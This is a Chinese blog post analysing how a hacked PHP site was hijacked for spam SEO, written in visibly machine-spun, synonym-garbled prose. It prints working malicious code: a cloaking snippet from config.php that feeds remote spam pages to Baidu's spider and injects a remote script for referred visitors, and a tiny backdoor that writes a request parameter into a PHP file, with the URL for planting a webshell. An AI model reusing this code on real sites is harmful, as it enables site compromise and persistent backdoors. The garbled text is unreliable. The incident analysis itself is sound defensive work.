以是一样平常网站挟制会被用来发布灰色广告,或者被用来做黑帽SEO。
之以是你的网站被入侵,是挂马者利用批量getshell工具,根据某个漏洞来批量拿到具有相同漏洞的网站,然后再将干系挟制代码加入到你的网站程序中,而这一系列动作都是用工具批量完成。

其实在我看来,如果创造你的网站被挂马挟制,你实在可以乐不雅观一点,最少你会知道你的网站存在严重的漏洞,却只是被工具挟制了,而不是被同行所利用,如果被专门的入侵者拿下,一样平常就不会简大略单的给你挂个马了,具体会严重的什么程度?这要看心情了,不开玩笑,而适值你又不太懂,如果木马隐蔽的好,这匹马将伴随你终生,白头到老。

挂马症状

长话短说,一样平常你会在搜索结果搜索干系关键词,或者自己的网址,看到的标题可能不是自己的网站标题,点击进去可能会跳转到其他地方,或者进去后创造网站已物是人非。

php挂马网站挂马劫持经典案例剖析黑链消除思绪 Docker

如:

本来是一个PS网站标题变成羞羞的内容,而内容已经不(wo)堪(hen)入(xi)目(huan)

挟制剖析

这种情形很明显挂漏洞本对user-agent进行了判断,如果user-agent是百度蜘蛛,那么将返回广告。

一样平常会在网站程序插入JS,或者在php或者其他程序中插入代码,如果是js,一样平常只要远程调用一个就可以实现挟制,插入代码量很少。

上面说到的这个凤楼……呸,是PS网我一开始习气性的判断为js挟制。
于是我往着缺点的方向开始了剖析之旅。

第一步:审核元素中查看网络连接

网站正常打开的时候先看看没有加载非常的脚本

个中加载的js都打开大略看下没有创造非常的脚本,这时候就有点慌了啊,没有引入外部脚本,那就可能隐蔽在现有的JS中,一样平常隐蔽也是加密后的,比较难以创造,于是每个js文件按个检讨一遍,依旧没有任何创造。

第二步:抓包剖析

第一步没有直接剖析出来,一样平常要么马隐蔽的深,要么便是根本不是用的JS,那么须要抓包剖析,怎么抓?这里就不说那么多了,可以在我以前的文章中找找。

先重现跳转的情景:

设置浏览器user-agent 为百度蜘蛛,这里我祭上一个超级好用的chrome插件

先用burpsuite抓一下看看,不过要先配置下不过滤JS脚本,

配置好代理,回车,走你

get首页,肯定没毛病,forward一下,这一下就相称主要了,如果下一步抓到js,首页还没跳,解释js搞鬼,而原形便是……没抓到js,出来直接抓到一个html页面,这个页面却是404,然后修改的首页直接蹦出来了!

这解释?

解释程序直接在加载首页文件,也便是index.php的时候就开始扰乱了。

至此可以判断为php挂马,在前端寻觅已经没有什么有用信息了。

第三步:找木马

这时候妹纸把网站程序源码包发过来了,ps:妹纸防备着呢,不给做事器权限,但是给了源码还是给了统统啊!
虽然没有什么可利用的地方,但我最少知道里面绝对藏着shell呢!

一样平常挂马程序都是会直接把黑链代码插到index.php中,不会判断太多,这种情形涌如今企业站中比较多,以是很自然的打开index.php,创造没有非常,也没有include非常php文件。

看到这里瞬间以为这个套路还是有点深度的,最少没那么明显。

连续找加载的文件,这时候脑洞大开,直接去找数据库配置文件,然后就这么结束了这段捉马旅程,没错,马就在config.php文件中

<?phpif (ereg("http://www.baidu.com/search/spider.htm", $_SERVER ["HTTP_USER_AGENT"])) {$file = file_get_contents('http://z..com/jie/70.html');echo $file;exit;}if(stristr ($_SERVER['HTTP_REFERER'],"http://www.baidu.com")) {echo "<script language='javascript' src='http://z.sloufeng.com/jc.js'></script><br/>";exit;}?>

大略剖析一下,这已经是最大略的挟制代码了,判断user-aget 如果是百度蜘蛛,把网页:http://z..com/jie/70.html内容输出,没错,这里面便是你想要的凤楼信息;然后判断referer是否为www.baidu.com,是的话加载下面的js,这个js里面又是一层判断,弹出其他页面,反正便是业务繁多,还有菠菜等页面。

实在我没有找太多干系的php文件,由于很明显这个马便是批量实现的,程序也不会智能的过分把马藏那么深,数据库文件肯定要加载的,结果就在里面,而且都没有加密,差评!

第四步:找shell

下面便是找shell了,我没有详细的去找,只是在同目录下创造一个后门,挺大略 的

<?php$dq = fopen($_SERVER["DOCUMENT_ROOT"].'/config/jc.php','w+');fwrite($dq,$_GET['msg']);?>

www.xxx.com/config/file.php?msg=一句话木马

这样就将一句话写到该目录下jc.php

题外话:这个凤楼广告竟然没有放任何联系办法和网址!
意义何在?差评!

先就这些吧